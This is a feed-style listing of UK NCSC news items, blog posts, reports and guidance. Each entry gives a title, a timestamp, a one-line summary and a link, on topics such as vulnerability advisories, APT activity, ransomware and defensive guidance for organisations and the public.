
Blog post from the NCSC and ICO aims to dispel common misconceptions that can discourage organisations from reporting a cyber attack.

https://www.ncsc.gov.uk/news/experts-challenge-myths-around-reporting-cyber-attacks-in-bid-to-help-break-cycle-of-crime
Advisory: Exim mail server vulnerabilities
2025-03-12T12:19:55Z | 1741781995

Hundreds of UK organisations at risk of compromise due to Exim mail server vulnerabilities

https://www.ncsc.gov.uk/news/exim-mail-server-vulnerabilities-advisory
Director GCHQ on global security amid war in Ukraine
2025-03-12T12:19:28Z | 1741781968

The head of the UK’s intelligence, cyber and security agency, Director GCHQ Sir Jeremy Fleming spoke at an event at the Australian National University.

https://www.ncsc.gov.uk/news/director-gchq-speaks-asd-75th-anniversary
Cyber Assessment Framework 3.2
2025-03-12T12:19:12Z | 1741781952

Latest version of the CAF reflects the increased threat to critical national infrastructure

https://www.ncsc.gov.uk/blog-post/cyber-assessment-framework-3-2
CYBERUK programme unveiled one month ahead of flagship conference
2025-03-12T12:18:33Z | 1741781913

This year's event will bring together the UK’s cyber security community to examine and advance what it means to take a whole of society approach to cyber security.

https://www.ncsc.gov.uk/news/cyberuk-programme-unveiled-one-months-ahead-of-flagship-conference
CNI system design: Secure Remote Access
2025-03-12T12:18:32Z | 1741781912

A Critical National Infrastructure (CNI)-specific look at NCSC guidance on remote access architecture design

https://www.ncsc.gov.uk/blog-post/cni-system-design-secure-remote-access
CyberFirst Girls triumph in national cyber competition at iconic Jodrell Bank
2025-03-12T12:18:19Z | 1741781899

Teams from across the UK have been crowned CyberFirst Girls Competition champions.

https://www.ncsc.gov.uk/news/cyberfirst-girls-iconic-jodrell-bank
CyberFirst Girls scoop prizes following success in national cyber security competition
2025-03-12T12:18:08Z | 1741781888

Winning teams from across the UK have been recognised for their success in the CyberFirst Girls Competition at an awards ceremony hosted at the University of Oxford’s Robotics Institute

https://www.ncsc.gov.uk/news/cyberfirst-girls-scoop-prizes-following-success-in-national-cyber-security-competition
Cloud security made easier with Serverless
2025-03-12T12:18:05Z | 1741781885

Our research shows that using Serverless components makes it easier to get good security in the cloud

https://www.ncsc.gov.uk/blog-post/cloud-security-made-easier-with-serverless
Check your email security, and protect your customers
2025-03-12T12:17:46Z | 1741781866

Free online tool from the NCSC prevents cyber criminals using your email to conduct cyber attacks.

https://www.ncsc.gov.uk/blog-post/cyes-protect-customers
ChatGPT and large language models: what's the risk?
2025-03-12T12:17:25Z | 1741781845

Do loose prompts* sink ships? Exploring the cyber security issues of ChatGPT and LLMs.

https://www.ncsc.gov.uk/blog-post/chatgpt-and-large-language-models-whats-the-risk
Cyber insurance industry unites to bear down on ransom payments
2025-03-12T12:16:37Z | 1741781797

Joint guidance from the NCSC with the Association of British Insurers (ABI), British Insurance Brokers’ Association (BIBA) and International Underwriting Association (IUA) aims to help organisations faced with ransomware demands minimise disruption and the cost of an incident.

https://www.ncsc.gov.uk/news/cyber-insurance-industry-unites-reduce-ransom-harm
Cyber experts warn of rising threat from irresponsible use of commercial hacking tools over the next five years
2025-03-12T12:16:21Z | 1741781781

New report from the NCSC assesses the threat to UK industry and society from the use of commercial cyber tools and services.

https://www.ncsc.gov.uk/news/cyber-experts-warn-of-rising-threat-from-commercial-hacking-tools-over-the-next-five-years
Bring Your Own Device: How to do it well
2025-03-12T12:16:08Z | 1741781768

Updated NCSC guidance on enabling your staff to use their own devices for work.

https://www.ncsc.gov.uk/blog-post/bring-your-own-device-how-to-do-it-well
Cyber Essentials scheme marks a decade of boosting businesses’ cyber defences
2025-03-12T12:15:56Z | 1741781756

Following the 10 successful years of the Cyber Essentials scheme, more businesses urged to strengthen cyber security protections

https://www.ncsc.gov.uk/news/cyber-essentials-scheme-marks-a-decade-of-boosting-businesses-cyber-defences
Business email compromise: new guidance to protect your organisation
2025-03-12T12:15:46Z | 1741781746

How to disrupt targeted phishing attacks aimed at senior executives or budget holders.

https://www.ncsc.gov.uk/blog-post/business-email-compromise-guidance-protect-organisation
Cyber agencies unveil new guidelines to secure edge devices from increasing threat
2025-03-12T12:15:40Z | 1741781740

New guidelines encourage device manufacturers to include and enable standard logging and forensic features that are robust and secure by default.

https://www.ncsc.gov.uk/news/cyber-agencies-unveil-new-guidelines-to-secure-edge-devices-from-increasing-threat
Collaboration only way to respond to cyber threats says renowned tech entrepreneur
2025-03-12T12:15:23Z | 1741781723

The interview with Hermann Hauser will be aired later this week at the NCSC's cyber security conference CYBERUK, held in Belfast.

https://www.ncsc.gov.uk/news/collaboration-only-way-to-respond-to-cyber-threats-says-renowned-tech-entrepreneur
Code of Practice for Cyber Security and Safety in Engineering
2025-03-12T12:15:02Z | 1741781702

The Institution of Engineering and Technology has published a Code of Practice with the support of the NCSC.

https://www.ncsc.gov.uk/news/code-of-practice-cyber-security-and-safety-in-engineering
Charities offered latest insight into key cyber threats to help keep out attackers
2025-03-12T12:14:50Z | 1741781690

Latest report published by the NCSC outlines key threats facing the UK charity sector.

https://www.ncsc.gov.uk/news/charities-offered-latest-insight-into-key-cyber-threats-to-help-keep-out-attackers
Building on our history of cryptographic research
2025-03-12T12:14:39Z | 1741781679

The NCSC has published new cryptographic research on robust cryptography – we explain its significance and how the ideas could support research to inform future global standards.

https://www.ncsc.gov.uk/blog-post/building-on-our-history-cryptographic-research
Business leaders urged to grip cyber risks with fresh support from experts
2025-03-12T12:14:37Z | 1741781677

Refreshed guidance from the NCSC will support board members govern online risk.

https://www.ncsc.gov.uk/news/business-leaders-urged-to-grid-cyber-risk-with-fresh-support-from-experts
Building a nation-scale evidence base for cyber deception
2025-03-12T12:14:19Z | 1741781659

The NCSC is inviting UK organisations to contribute evidence of cyber deception use cases and efficacy to support our long-term research goals.

https://www.ncsc.gov.uk/blog-post/building-a-nation-scale-evidence-base-for-cyber-deception
British tech startups offered help to keep innovations secure
2025-03-12T12:14:02Z | 1741781642

New guidance from the NCSC and the Centre for the Protection of National Infrastructure (CPNI) to help fledgling technical companies consider key questions around security.

https://www.ncsc.gov.uk/news/british-tech-startups-offered-help-to-keep-innovations-secure
Black Friday warning: shoppers urged to protect themselves online as figures reveal rising losses to scams
2025-03-12T12:13:41Z | 1741781621

UK’s cyber security and law enforcement bodies warn bargain hunters about cyber criminal scams and support turning on 2-step verification (2SV) to protect online accounts.

https://www.ncsc.gov.uk/news/black-friday-warning-figures-reveal-rising-losses-scams
Are you hungry? A two-part blog about risk appetites
2025-03-12T12:12:49Z | 1741781569

Risk appetites; what are they, what’s their purpose, how do organisations go about defining them?

https://www.ncsc.gov.uk/blog-post/a-two-part-blog-about-risk-appetites
Applying the Cloud Security Principles in practice: a case study
2025-03-12T12:12:26Z | 1741781546

Using the Cloud Security Principles to evaluate the suitability of a cloud service.

https://www.ncsc.gov.uk/blog-post/applying-the-cloud-security-principles
Announcing IASME as our second Delivery Partner for Cyber Incident Response Level 2
2025-03-12T12:12:07Z | 1741781527

Both CIR Delivery Partners are now accepting enquiries and applications.

https://www.ncsc.gov.uk/blog-post/announcing-iasme-delivery-partner-cyber-incident-response-l2
Black Friday bargain hunters warned of enhanced online scams after millions lost last year
2025-03-12T12:11:35Z | 1741781495

Latest Cyber Aware campaign aims to help shoppers protect themselves online in the run up to the festive period.

https://www.ncsc.gov.uk/news/black-friday-bargain-hunters-warned-of-enhanced-online-scams-after-millions-lost-last-year
An RFC on IoCs – playing our part in international standards
2025-03-12T12:11:26Z | 1741781486

The NCSC has published a new RFC on Indicators of Compromise to support cyber security in protocol design - and hopes to encourage more cyber defenders to engage with international standards.

https://www.ncsc.gov.uk/blog-post/rfc-indicators-of-compromise-for-ietf
Big brands urged to 'scam-proof' messages to public
2025-03-12T12:10:53Z | 1741781453

The NCSC launches new guidance for organisations on securely communicating with customers via SMS and phone calls.

https://www.ncsc.gov.uk/news/big-brands-urged-to-scam-proof-messages-to-public
AIT fraud: what you need to know
2025-03-12T12:10:33Z | 1741781433

SMS and telephone guidance updated to address the rise in Artificial Inflation of Traffic (AIT).

https://www.ncsc.gov.uk/blog-post/ait-fraud-what-you-need-to-know
Artificial Intelligence: 'call for views' on the cyber security of AI closes soon
2025-03-12T12:09:46Z | 1741781386

Businesses, academia and international partners invited to respond to the UK government's ‘call for views’ on the security of AI.

https://www.ncsc.gov.uk/blog-post/ai-cyber-security-call-closes-soon
Vulnerabilities exploited in VPN products used worldwide
2025-03-12T12:09:11Z | 1741781351

APTs are exploiting vulnerabilities in several VPN products used worldwide

https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities
Advanced Mobile Solutions (AMS) guidance trailer
2025-03-12T12:09:00Z | 1741781340

Chris P explains how AMS will enable high-threat organisations to stay connected ‘on the go'.

https://www.ncsc.gov.uk/blog-post/advanced-mobile-solutions-update
The NCSC Annual Review 2020
2025-03-12T12:08:47Z | 1741781327

Highlights from the last twelve months at the NCSC.

https://www.ncsc.gov.uk/news/annual-review-2020
Active Cyber Defence: Sixth annual report now available
2025-03-12T12:08:26Z | 1741781306

New ACD services developed to help protect SMEs from the harms caused by cyber attacks.

https://www.ncsc.gov.uk/blog-post/active-cyber-defence-6th-annual-report-available
The NCSC Annual Review 2019
2025-03-12T12:08:10Z | 1741781290

Developments and highlights from the last twelve months at the NCSC.

https://www.ncsc.gov.uk/news/annual-review-2019
ACD 2.0: Insights from the external attack surface management trials
2025-03-12T12:08:01Z | 1741781281

We publish the results of our ACD 2.0 external attack surface management (EASM) trials

https://www.ncsc.gov.uk/blog-post/active-cyber-defence-2-insights-easm-trials
All UK schools offered free cyber service to protect against online threats
2025-03-12T12:07:57Z | 1741781277

Following the successful initial roll out of PDNS for Schools last year, all schools in the UK can now benefit from the enhanced cyber resilience service.

https://www.ncsc.gov.uk/news/all-uk-schools-offered-free-cyber-service-to-protect-against-online-threats
Alert: UK organisations should patch Netlogon vulnerability (Zerologon)
2025-03-12T12:07:42Z | 1741781262

Microsoft Windows Netlogon vulnerability is being actively exploited and organisations should install necessary updates as soon as is practicable.

https://www.ncsc.gov.uk/news/alert-organisations-should-patch-netlogon-vulnerability
ACD 2.0 exploration into attack surface management completed
2025-03-12T12:07:30Z | 1741781250

We thank participants and look forward to sharing what we've learned

https://www.ncsc.gov.uk/blog-post/active-cyber-defence-2-easm-update
Accessibility as a cyber security priority
2025-03-12T12:07:04Z | 1741781224

Want security that works better for people? Make it accessible.

https://www.ncsc.gov.uk/blog-post/accessibility-as-a-cyber-security-priority
Alert: Further ransomware attacks on the UK education sector by cyber criminals
2025-03-12T12:06:59Z | 1741781219

The NCSC is responding to further ransomware attacks on the education sector by cyber criminals.

https://www.ncsc.gov.uk/news/alert-targeted-ransomware-attacks-on-uk-education-sector
Alert: Potential legacy risk from malware targeting QNAP NAS devices
2025-03-12T12:06:46Z | 1741781206

A joint NCSC and CISA alert detailing the legacy risk of the malware Qsnatch to QNAP NAS devices

https://www.ncsc.gov.uk/news/legacy-risk-malware-targeting-qnap-nas-devices
A problem shared is . . . in the research problem book
2025-03-12T12:06:41Z | 1741781201

Introducing the new NCSC research problem book and find out how you can get involved.

https://www.ncsc.gov.uk/blog-post/problem-shared-problem-research-book
Alert: Multiple actors are attempting to exploit MobileIron vulnerability CVE 2020-15505
2025-03-12T12:06:25Z | 1741781185

MobileIron remote code execution vulnerability is a target for APT nation state groups and cyber criminals to compromise the networks of UK organisations.

https://www.ncsc.gov.uk/news/alert-multiple-actors-attempt-exploit-mobileiron-vulnerability
Alert: Apache Log4j vulnerabilities
2025-03-12T12:06:05Z | 1741781165

The NCSC is advising organisations to take steps to mitigate the Apache Log4j vulnerabilities.

https://www.ncsc.gov.uk/news/apache-log4j-vulnerability
Alert: Actors exploiting Citrix products vulnerability
2025-03-12T12:05:40Z | 1741781140

An NCSC alert detailing the investigation into the exploitation of a critical vulnerability in Citrix products.

https://www.ncsc.gov.uk/news/citrix-alert
A decade of Cyber Essentials: the journey towards a safer digital future
2025-03-12T12:05:26Z | 1741781126

The 10-year anniversary of Cyber Essentials is not just a celebration of past achievements but a call to action for the future.

https://www.ncsc.gov.uk/blog-post/cyber-essentials-decade
Use of credential stuffing tools
2025-03-12T12:05:17Z | 1741781117

This advisory provides information about credential stuffing as a method of attack, and gives advice on how to protect an organisation against it.

https://www.ncsc.gov.uk/news/use-credential-stuffing-tools
'PDNS for Schools' to provide cyber resilience for more institutions
2025-03-12T12:04:37Z | 1741781077

The NCSC’s ‘Protective Domain Name Service for Schools’ scaled-up to protect a wider range of organisations.

https://www.ncsc.gov.uk/blog-post/pdns-for-schools-provide-cyber-resilience-for-more-institutions
'NCSC Cyber Series' podcast now available
2025-03-12T12:03:32Z | 1741781012

Listen to all five episodes now, covering a wide range of cyber security topics.

https://www.ncsc.gov.uk/blog-post/cyber-series-podcast
"Winning trust, and making powerful connections"
2025-03-12T12:03:10Z | 1741780990

Chris Wallis, CEO of Intruder, explains how completing the NCSC's Startup Programme was a turning point for his organisation.

https://www.ncsc.gov.uk/blog-post/winning-trust-and-making-powerful-connections
"What's happened to my data?"
2025-03-12T12:02:45Z | 1741780965

Irrespective of whether the ransom is paid, a ransomware attack means organisations have lost control of their information.

https://www.ncsc.gov.uk/blog-post/whats-happened-data
"If you have knowledge, let others light their candles in it."
2025-03-12T12:02:26Z | 1741780946

Why sharing lessons learned from cyber security incidents and ‘near misses’ will help everyone to improve

https://www.ncsc.gov.uk/blog-post/let-others-light-candles
Advisory: Turla group exploits Iranian APT to expand coverage of victims
2025-03-12T12:01:44Z | 1741780904

A joint report from the NCSC and NSA highlighting Turla activity

https://www.ncsc.gov.uk/news/turla-group-exploits-iran-apt-to-expand-coverage-of-victims
Ongoing DNS hijacking and mitigation advice
2025-03-12T11:58:06Z | 1741780686

This NCSC advisory highlights further hijacking activity of Domain Name Systems, and provides mitigation advice.

https://www.ncsc.gov.uk/news/ongoing-dns-hijacking-and-mitigation-advice
NCSC and allies reveal most common cyber vulnerabilities exploited in 2022
2025-03-12T11:57:27Z | 1741780647

New advisory highlights how threat actors exploited a larger number of older software vulnerabilities rather than more recently disclosed flaws last year.

https://www.ncsc.gov.uk/news/ncsc-allies-reveal-2022-common-exploited-vulnerabilities
Indicators of compromise for malware used by APT28
2025-03-12T11:57:01Z | 1741780621

This is a technical advisory on the threat actor APT28, written for the network defender community. It provides an overview of the actor and information about associated malware and tooling, with indicators of compromise and signatures that can be used to detect potential presence of the actor on a network. It concludes with mitigation guidelines for protecting networks against activity by APT28 and other hostile actors.

https://www.ncsc.gov.uk/news/indicators-of-compromise-for-malware-used-by-apt28
Advisory: COVID-19 exploited by malicious cyber actors
2025-03-12T11:56:22Z | 1741780582

Practical advice for individuals and organisations on how to deal with COVID-19 related malicious cyber activity.

https://www.ncsc.gov.uk/news/covid-19-exploited-by-cyber-actors-advisory
Advisory: APT29 targets COVID-19 vaccine development
2025-03-12T11:55:55Z | 1741780555

Detection and mitigation advice for organisations involved in coronavirus vaccine development targeted with custom malware by APT29.

https://www.ncsc.gov.uk/news/advisory-apt29-targets-covid-19-vaccine-development
APT28 exploits known vulnerability to carry out reconnaissance and deploy malware on Cisco routers
2025-03-12T11:55:29Z | 1741780529

APT28 accesses poorly maintained Cisco routers and deploys malware on unpatched devices using CVE-2017-6742.

https://www.ncsc.gov.uk/news/apt28-exploits-known-vulnerability-to-carry-out-reconnaissance-and-deploy-malware-on-cisco-routers
APT10 continuing to target UK organisations
2025-03-12T11:54:05Z | 1741780445

An updated report on APT10's continued targeting of UK organisations.

https://www.ncsc.gov.uk/news/apt10-continuing-target-uk-organisations
Advisory: APT groups target healthcare and essential services
2025-03-12T11:52:45Z | 1741780365

Joint UK and US advisory highlights ongoing activity by APT groups against organisations involved in the international coronavirus response.

https://www.ncsc.gov.uk/news/apt-groups-target-healthcare-essential-services-advisory
Joint Advisory: Exploitation of Accellion File Transfer Appliance
2025-03-12T11:52:33Z | 1741780353

Cyber security organisations in the UK, USA, Australia, New Zealand, and Singapore publish advice to defend against malicious cyber actors.

https://www.ncsc.gov.uk/news/ncsc-advisory-on-accellion-file-transfer-appliance-customers
Updated advice on Pulse Connect Secure RCE Vulnerability
2025-03-12T11:51:47Z | 1741780307

Advice for UK organisations using Pulse Connect Secure (PCS) VPN appliances.

https://www.ncsc.gov.uk/news/advice-on-pulse-connect-secure-rce-vulnerability
Microsoft vulnerabilities exploitation - updated advice
2025-03-12T11:51:30Z | 1741780290

Urgent updates and actions following Exchange server vulnerabilities

https://www.ncsc.gov.uk/news/advice-following-microsoft-vulnerabilities-exploitation
Active exploitation of vulnerability affecting Ivanti Connect Secure
2025-03-12T11:50:39Z | 1741780239

Organisations are encouraged to take immediate action to mitigate vulnerabilities affecting Ivanti Connect Secure, Policy Secure and ZTA Gateways (CVE-2025-0282, CVE-2025-0283) and to follow the latest vendor advice.

https://www.ncsc.gov.uk/news/active-exploitation-ivanti-vulnerability
3CX DesktopApp security issue
2025-03-12T11:48:35Z | 1741780115

NCSC advice following a security issue in the 3CX DesktopApp.

https://www.ncsc.gov.uk/news/3cx-desktopapp-security-issue
Why Stolen Credentials Are the #1 Threat to Mobile Security
2025-03-12T11:30:00Z | 1741779000

“Cybercriminals are increasingly logging in rather than hacking into networks through valid accounts.”— IBM Security X-Force Threat Index 2024 “The use of stolen credentials remains the primary way into organizations, with 40% of breaches involving credentials as the top ‘action’ to entry taken.”— Verizon 2024 Data Breach Investigations Report In popular imagination, hackers navigate complex […] The post Why Stolen Credentials Are the #1 Threat to Mobile Security appeared first on NowSecure.

https://www.nowsecure.com/blog/2025/03/12/why-stolen-credentials-are-the-1-threat-to-mobile-security/
Vendor Security Assessment
2025-03-12T11:21:29Z | 1741778489

Assessing the security of network equipment.

https://www.ncsc.gov.uk/report/vendor-security-assessment
Threat report on application stores
2025-03-12T11:20:59Z | 1741778459

This report outlines the risks associated with the use of official and third party app stores.

https://www.ncsc.gov.uk/report/threat-report-on-application-stores
The threat from commercial cyber proliferation
2025-03-12T11:20:26Z | 1741778426

Report informing readers about the threat to UK industry and society from commercial cyber tools and services.

https://www.ncsc.gov.uk/report/commercial-cyber-proliferation-assessment
The near-term impact of AI on the cyber threat
2025-03-12T11:20:01Z | 1741778401

An NCSC assessment focusing on how AI will impact the efficacy of cyber operations and the implications for the cyber threat over the next two years.

https://www.ncsc.gov.uk/report/impact-of-ai-on-cyber-threat
The cyber threat to Universities
2025-03-12T11:19:33Z | 1741778373

Assessing the cyber security threat to UK Universities

https://www.ncsc.gov.uk/report/the-cyber-threat-to-universities
The Cyber Threat to UK Business
2025-03-12T11:19:11Z | 1741778351

First joint National Cyber Security Centre (NCSC) and National Crime Agency (NCA) report published today.

https://www.ncsc.gov.uk/report/cyber-threat-uk-business
The cyber threat to sports organisations
2025-03-12T11:18:10Z | 1741778290

The NCSC report highlights the cyber threats faced by the sports sector and suggests how to stop or lessen their impact on organisations.

https://www.ncsc.gov.uk/report/the-cyber-threat-to-sports-organisations
Summary of the NCSC analysis of May 2020 US sanction
2025-03-12T11:17:43Z | 1741778263

A summary of the NCSC’s analysis of the May 2020 US sanction which caused the NCSC to modify the scope of its security mitigation strategy for Huawei.

https://www.ncsc.gov.uk/report/summary-of-ncsc-analysis-of-us-may-2020-sanction
Summary of NCSC’s security analysis for the UK telecoms sector
2025-03-12T11:16:51Z | 1741778211

A summary of the NCSC’s security analysis for the UK telecoms sector

https://www.ncsc.gov.uk/report/summary-of-ncsc-security-analysis-for-the-uk-telecoms-sector
Technical report: Responsible use of the Border Gateway Protocol (BGP) for ISP interworking
2025-03-12T11:12:10Z | 1741777930

Technical report on best practice use of this fundamental data routing protocol.

https://www.ncsc.gov.uk/report/responsible-use-of-bgp-for-isp-interworking
Organisational use of Enterprise Connected Devices
2025-03-12T11:11:45Z | 1741777905

Assessing the cyber security threat to UK organisations using Enterprise Connected Devices.

https://www.ncsc.gov.uk/report/organisational-use-of-enterprise-connected-devices
Joint report on publicly available hacking tools
2025-03-12T11:11:20Z | 1741777880

How to limit the effectiveness of tools commonly used by malicious actors.

https://www.ncsc.gov.uk/report/joint-report-on-publicly-available-hacking-tools
Incident trends report (October 2018 - April 2019)
2025-03-12T11:10:04Z | 1741777804

Cyber incident trends in the UK with guidance on how to defend against, and recover from them.

https://www.ncsc.gov.uk/report/incident-trends-report
High level privacy and security design for NHS COVID-19 contact tracing app
2025-03-12T11:09:09Z | 1741777749

NCSC technical paper about the privacy and security design of the NHS contact tracing app developed to help slow the spread of coronavirus.

https://www.ncsc.gov.uk/report/nhs-covid-19-app-privacy-security-report
Decrypting diversity: Diversity and inclusion in cyber security report 2020
2025-03-12T11:08:45Z | 1741777725

Joint report between the NCSC and KPMG UK is the first in a series to benchmark and track levels of diversity and inclusion in the cyber security industry.

https://www.ncsc.gov.uk/report/diversity-and-inclusion-in-cyber-security-report
Decrypting diversity: Diversity and inclusion in cyber security report 2021
2025-03-12T11:07:13Z | 1741777633

The 2nd joint report between the NCSC and KPMG UK benchmarks against the 2020 findings to gauge what progress has been made.

https://www.ncsc.gov.uk/report/decrypting-diversity-2021-diversity-and-inclusion-in-cyber-security
Cyber Threat Report: UK Legal Sector
2025-03-12T11:06:02Z | 1741777562

An updated report from the NCSC explaining how UK law firms - of all sizes - can protect themselves from common cyber threats.

https://www.ncsc.gov.uk/report/cyber-threat-report-uk-legal-sector
Active Cyber Defence (ACD) - The Second Year
2025-03-12T11:04:30Z | 1741777470

The second report examining how the NCSC's ACD programme is improving the security of the UK public sector and the wider UK cyber ecosystem.

https://www.ncsc.gov.uk/report/active-cyber-defence-report-2019
Active Cyber Defence (ACD) - The Third Year
2025-03-12T11:04:10Z | 1741777450

The year three report covers 2019 and aims to highlight the achievements and efforts made by the Active Cyber Defence programe.

https://www.ncsc.gov.uk/report/acd-report-year-three
ACD - The Sixth Year
2025-03-12T11:02:40Z | 1741777360

Key findings and full report from the 6th year of the Active Cyber Defence (ACD) programme.

https://www.ncsc.gov.uk/report/acd-the-sixth-year
Active Cyber Defence (ACD) - the fourth year
2025-03-12T11:02:13Z | 1741777333

The year four report covers 2020 and aims to highlight the achievements and efforts made by the Active Cyber Defence programme.

https://www.ncsc.gov.uk/report/acd-report-year-four
ACD - The Fifth Year
2025-03-12T11:01:44Z | 1741777304

Key findings from the 5th year of the Active Cyber Defence (ACD) programme.

https://www.ncsc.gov.uk/report/acd-the-fifth-year
A method to assess 'forgivable' vs 'unforgivable' vulnerabilities
2025-03-12T11:01:22Z | 1741777282

Research from the NCSC designed to eradicate vulnerability classes and make the top-level mitigations easier to implement.

https://www.ncsc.gov.uk/report/a-method-to-assess-forgivable-vs-unforgivable-vulnerabilities
Zero trust: building a mixed estate
2025-03-12T10:46:49Z | 1741776409

Two ways organisations can enable access and maintain the security benefits of zero trust even when parts of the infrastructure can't implement the zero trust principles.

https://www.ncsc.gov.uk/guidance/zero-trust-building-a-mixed-estate
What is an antivirus product? Do I need one?
2025-03-12T10:44:08Z | 1741776248

Detect and prevent malicious software and viruses on your computer or laptop.

https://www.ncsc.gov.uk/guidance/what-is-an-antivirus-product
Vulnerability scanning tools and services
2025-03-12T10:40:16Z | 1741776016

Advice on the choice, implementation and use of automated vulnerability scanning tools for organisations of all sizes.

https://www.ncsc.gov.uk/guidance/vulnerability-scanning-tools-and-services
Video conferencing services: using them securely
2025-03-12T10:35:53Z | 1741775753

How to set up and use video conferencing services, such as Zoom and Skype, safely and securely

https://www.ncsc.gov.uk/guidance/video-conferencing-services-using-them-securely
Video conferencing services: security guidance for organisations
2025-03-12T10:35:32Z | 1741775732

Guidance to help you to choose, configure and deploy video conferencing services such as Zoom and Skype within your organisation

https://www.ncsc.gov.uk/guidance/video-conferencing-services-security-guidance-organisations
Using IPsec to protect data
2025-03-12T10:16:42Z | 1741774602

Guidance for organisations wishing to deploy products that use IPsec.

https://www.ncsc.gov.uk/guidance/using-ipsec-protect-data
Using TLS to protect data
2025-03-12T10:15:41Z | 1741774541

Recommended profiles to securely configure TLS for the most common versions and scenarios, with additional guidance for managing older versions.

https://www.ncsc.gov.uk/guidance/using-tls-to-protect-data
Transaction Monitoring for online services
2025-03-12T10:14:34Z | 1741774474

This guidance is aimed at service owners and security specialists involved in the provision of online services.

https://www.ncsc.gov.uk/guidance/transaction-monitoring-for-online-services
Takedown: removing malicious content to protect your brand
2025-03-12T10:14:11Z | 1741774451

How to protect your brand from being exploited online.

https://www.ncsc.gov.uk/guidance/takedown-removing-malicious-content-to-protect-your-brand
Systems administration architectures
2025-03-12T10:13:49Z | 1741774429

There are a number of different architectural models that can be used to design the administration approach for IT systems. This section describes some common approaches and the risks associated with each.

https://www.ncsc.gov.uk/guidance/systems-administration-architectures
Supplier assurance questions
2025-03-12T10:08:04Z | 1741774084

Questions to ask your suppliers that will help you gain confidence in their cyber security.

https://www.ncsc.gov.uk/guidance/supplier-assurance-questions
Social media: protecting what you publish
2025-03-12T10:07:34Z | 1741774054

How to reduce the likelihood of unauthorised content appearing within your organisation's social media channels.

https://www.ncsc.gov.uk/guidance/social-media-protect-what-you-publish
Social Media: how to use it safely
2025-03-12T10:07:14Z | 1741774034

Use privacy settings across social media platforms to manage your digital footprint.

https://www.ncsc.gov.uk/guidance/social-media-how-to-use-it-safely
Smart devices: using them safely in your home
2025-03-12T10:06:53Z | 1741774013

Many everyday items are now connected to the internet: we explain how to use them safely.

https://www.ncsc.gov.uk/guidance/smart-devices-in-the-home
Shopping and paying safely online
2025-03-12T10:06:34Z | 1741773994

Tips to help you purchase items safely and avoid fraudulent websites.

https://www.ncsc.gov.uk/guidance/shopping-online-securely
Shadow IT
2025-03-12T10:06:14Z | 1741773974

Managing 'unknown assets' that are used within an organisation.

https://www.ncsc.gov.uk/guidance/shadow-it
Sextortion emails: how to protect yourself
2025-03-12T10:05:12Z | 1741773912

Advice in response to the increase in sextortion scams

https://www.ncsc.gov.uk/guidance/sextortion-scams-how-to-protect-yourself
Annual Procurement Plan for the Fiscal Year 2024-25 (Revised)
2025-03-12T10:04:42Z | 1741773882

Annual Procurement Plan for the Fiscal Year 2024-25 (Revised) has been published. Click Here to Download the Document

https://www.cirt.gov.bd/annual-procurement-plan-year-2024-25-revised/
Setting up 2-Step Verification (2SV)
2025-03-12T10:04:38Z | 1741773878

How setting up 2SV can help protect your online accounts, even if your password is stolen.

https://www.ncsc.gov.uk/guidance/setting-2-step-verification-2sv
Securing your devices
2025-03-12T10:04:18Z | 1741773858

How to ensure your devices are as secure as possible.

https://www.ncsc.gov.uk/guidance/securing-your-devices
Secure sanitisation and disposal of storage media
2025-03-12T10:03:55Z | 1741773835

How to ensure data cannot be recovered from electronic storage media.

https://www.ncsc.gov.uk/guidance/secure-sanitisation-storage-media
Secure communications principles
2025-03-12T10:03:06Z | 1741773786

Guidance to help you assess the security of voice, video and messaging communication services.

https://www.ncsc.gov.uk/guidance/secure-communication-principles
Scam 'missed parcel' SMS messages: advice on avoiding malware
2025-03-12T10:02:44Z | 1741773764

How to avoid malware sent using scam ‘missed parcel’ SMS messages, and what to do if your phone is already infected.

https://www.ncsc.gov.uk/guidance/scam-missed-parcel-sms-messages
ROCA: Infineon TPM and Secure Element RSA Vulnerability Guidance
2025-03-12T10:02:21Z | 1741773741

Guidance for those who want to understand and reduce the impact of the ROCA vulnerability.

https://www.ncsc.gov.uk/guidance/roca-infineon-tpm-and-secure-element-rsa-vulnerability-guidance
Responding to a cyber incident – a guide for CEOs
2025-03-12T10:01:36Z | 1741773696

Guidance to help CEOs in public and private sector organisations manage a cyber incident.

https://www.ncsc.gov.uk/guidance/ceos-responding-cyber-incidents
Reducing data exfiltration by malicious insiders
2025-03-12T10:01:11Z | 1741773671

Advice and recommendations for mitigating this type of insider behaviour.

https://www.ncsc.gov.uk/guidance/reducing-data-exfiltration-by-malicious-insiders
Recovering a hacked account
2025-03-12T10:00:36Z | 1741773636

A step by step guide to recovering online accounts.

https://www.ncsc.gov.uk/guidance/recovering-a-hacked-account
Putting staff welfare at the heart of incident response
2025-03-12T09:59:59Z | 1741773599

Guidance for staff responsible for managing a cyber incident response within their organisation.

https://www.ncsc.gov.uk/guidance/putting-staff-welfare-at-the-heart-of-incident-response
Provisioning and securing security certificates
2025-03-12T09:59:31Z | 1741773571

How certificates should be initially provisioned, and how supporting infrastructure should be securely operated.

https://www.ncsc.gov.uk/guidance/provisioning-and-securing-security-certificates
Protecting SMS messages used in critical business processes
2025-03-12T09:57:49Z | 1741773469

Security advice for organisations using text messages to communicate with end users

https://www.ncsc.gov.uk/guidance/protecting-sms-messages-used-in-critical-business-processes
Private Branch Exchange (PBX) best practice
2025-03-12T09:57:13Z | 1741773433

Protecting your organisation’s telephony systems from cyber attacks and telecoms fraud.

https://www.ncsc.gov.uk/guidance/private-branch-exchange-best-practice
Preventing Lateral Movement
2025-03-12T09:56:14Z | 1741773374

Guidance for preventing lateral movement in enterprise networks.

https://www.ncsc.gov.uk/guidance/preventing-lateral-movement
Phishing attacks: defending your organisation
2025-03-12T09:54:43Z | 1741773283

How to defend your organisation from email phishing attacks.

https://www.ncsc.gov.uk/guidance/phishing
Penetration testing
2025-03-12T09:54:16Z | 1741773256

How to get the most from penetration testing

https://www.ncsc.gov.uk/guidance/penetration-testing
Pattern: Safely Importing Data
2025-03-12T09:53:48Z | 1741773228

An architecture pattern for safely importing data into a system from an external source.

https://www.ncsc.gov.uk/guidance/pattern-safely-importing-data
Operational technologies
2025-03-12T09:52:52Z | 1741773172

Making sense of cyber security in OT environments

https://www.ncsc.gov.uk/guidance/operational-technologies
Online gaming for families and individuals
2025-03-12T09:52:02Z | 1741773122

How to enjoy online gaming securely by following just a few tips

https://www.ncsc.gov.uk/guidance/online-gaming-for-families-and-individuals
Network security fundamentals
2025-03-12T09:51:39Z | 1741773099

How to design, use, and maintain secure networks.

https://www.ncsc.gov.uk/guidance/network-security-fundamentals
NCSC advice: Malicious software used to illegally mine cryptocurrency
